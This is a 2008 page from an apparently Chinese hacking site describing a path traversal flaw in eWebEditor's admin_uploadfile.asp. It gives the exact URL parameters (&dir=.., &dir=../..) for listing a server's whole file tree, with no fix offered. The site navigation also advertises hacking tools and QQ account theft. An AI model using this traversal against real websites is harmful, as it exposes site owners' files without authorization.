网站首页
◆
黑客新闻
◆
黑客学院
◆
网络学院
◆
黑客软件
◆
黑客动画
◆
免费资源
◆
黑客搜索
◆
黑客查询
◆
加入会员
◆
黑客网址
◆
网站留言
◆
QQ资源网
【新闻中心】
|
业界动态
|
焦点新闻
|
病毒公告
|
漏洞公告
|
被黑新站
|
Q Q 新闻
|
娱乐新闻
|
军事新闻
|
硬件资讯
|
两性资讯
|
范文大全
|
ASP源码
|
PHP源码
【黑客学院】
|
黑客入门
|
游戏黑客
|
网吧黑客
|
脚本黑客
|
入侵检测
|
Q Q 黑客
|
黑客技术
|
黑客编程
|
黑客文化
|
黑客事件
|
网页特效
|
个性网名
|
情侣网名
【网络学院】
|
软件应用
|
图形图像
|
网络应用
|
硬件学堂
|
程序开发
|
Photoshop
|
FlashMX
|
CorelDRAW
|
Fireworks
|
Dreamweaver
|
html转js
|
js转html
|
盗QQ
【软件下载】
|
常用软件
|
系统工具
|
黑客工具
|
安全防御
|
开发工具
|
Q Q 黑软
|
游戏辅助
|
程序源码
|
素材专区
|
模板基地
|
发布软件
|
拼音字典
|
特殊符号
【黑客动画】
|
黑客入侵
|
木马配置
|
漏洞利用
|
加密破解
|
脚本入侵
|
Q Q 动画
|
免费光盘
|
制作
|
其它教程
|
发布教程
|
应用范文
|
绿色软件
|
黑客培训
【免费资源】
|
免费空间
|
免费域名
|
免费硬盘
|
免费帐号
|
免费代理
|
免费博客
|
免费赚钱
|
免费电影
|
免费小说
|
搞笑短信
|
个性签名
|
网页颜色
|
MD5查询
您现在的位置:
QQ黑客基地
>>
黑客学院
>>
脚本黑客
>> 黑客学院正文
eWebEditor遍历路径漏洞
作者:admin2 黑客学院来源:本站原创 点击数: 更新时间:2008-1-17
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径
漏洞
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ *>
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:暂无
http://www.ewebeditor.net/
上一个黑客学院:
检测南方数据整站系统
下一个黑客学院: 没有了
赞助广告
最新更新文章
·
eWebEditor遍历路径漏洞
01-17
·
检测南方数据整站系统
01-17
·
lxblog rss.php爆路径
01-17
·
Sql脚本注射技巧整理
01-17
·
Windows系统下的远程堆栈溢出实战篇
01-15
·
雷驰新闻发布管理系统v3.0漏洞很简单
01-14
·
手工检测誉天IT教育集团网站
01-14
·
百尔买电子商务系统几个漏洞的分析
01-14
·
脚本后门的深入--图片中的后门
01-12
·
推荐:跨站脚本执行漏洞代码的六点思路
01-11
热门推荐文章
此栏目下没有热点推荐黑客学院
关于我们
联系我们
招聘信息
加入会员
诚征代理
广告服务
欢迎投稿
友情链接
网站地图
7X24咨询电话:13279515908 投诉电话:+86-029-38118822
客服QQ:36362 售后QQ:244163 技术QQ:250366708
Copyright ©2008版权没有-任意抄袭-确保完整
工商营业执照号码:622701198410144516
陇ICP备06000402号
[设为首页]
·
[加入收藏]
